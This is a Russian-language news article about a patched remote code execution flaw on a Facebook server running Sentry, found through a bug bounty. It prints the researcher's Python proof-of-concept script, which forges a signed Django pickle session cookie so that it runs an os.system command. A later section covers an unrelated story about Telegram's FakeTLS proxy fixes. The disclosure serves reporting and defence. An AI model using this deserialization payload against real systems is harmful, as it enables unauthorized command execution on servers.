Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Vulnerability Management 2026: что в управлении уязвимостями уже не работает?
Регистрируйтесь на эфир!

Екатерина Быстрова 06 Апреля 2026 - 13:51

Соответствие законодательству РФ Домашние пользователи Системы контентной веб-фильтрации

Telegram приписал чужую победу: кто на самом деле починил прокси

Давид Осипов из B2B обвинил Telegram в том, что команда мессенджера присвоила себе заслуги за обход блокировок прокси в России. По его версии, критические исправления для FakeTLS первыми нашли и подготовили не разработчики Telegram, а энтузиасты из сообщества Telemt.

Осипов пишет, что официальная команда мессенджера якобы месяцами не трогала проблемный код, хотя разговоры о возможных ограничениях Telegram-прокси в России шли как минимум с начала 2026 года.

Когда в апреле у многих пользователей начали отваливаться соединения, а встроенная маскировка FakeTLS перестала работать как надо, Telegram, по его словам, не предложил быстрого собственного решения, а паузу заполнили участники профильного сообщества.

По версии Осипова, именно энтузиасты занялись разбором TLS-хендшейка, сравнили поведение Telegram с трафиком обычного браузера, нашли подозрительные сигнатуры и подготовили конкретные исправления. После этого изменения оформили в предложения для изменения кода Telegram Desktop, а уже затем часть этих правок попала в официальный клиент.

То, что Telegram Desktop действительно получил свежие обновления в начале апреля, видно по странице релизов на GitHub: там указаны версии 6.7.2 и 6.7.3, выпущенные 3 и 4 апреля. В README проекта Telemt при этом отдельно сказано, что исправленный TLS ClientHello уже доступен в Telegram Desktop начиная с версии 6.7.2, а для Android официальные релизы ещё находятся в процессе внедрения.

Главная претензия Осипова: Telegram в публичной коммуникации выглядит победителем, хотя реальную инженерную работу, по его мнению, сначала проделало сообщество. Особенно его задела формулировка из поста Павла Дурова о том, что Telegram «со своей стороны» продолжит адаптироваться и делать трафик мессенджера более трудным для обнаружения и блокировки. Дуров действительно написал, что команда будет и дальше усложнять детектирование и блокировку трафика Telegram на фоне ограничений в России.

Осипов при этом настаивает: нынешние исправления — это лишь хотфикс, а не полноценное решение. По его словам, даже после патча в реализации FakeTLS остаются другие потенциально заметные сигнатуры, а значит, проблема не сводится к паре строк кода. Иначе говоря, история, по его версии, ещё далеко не закончилась.

Vulnerability Management 2026: что в управлении уязвимостями уже не работает?
Регистрируйтесь на эфир!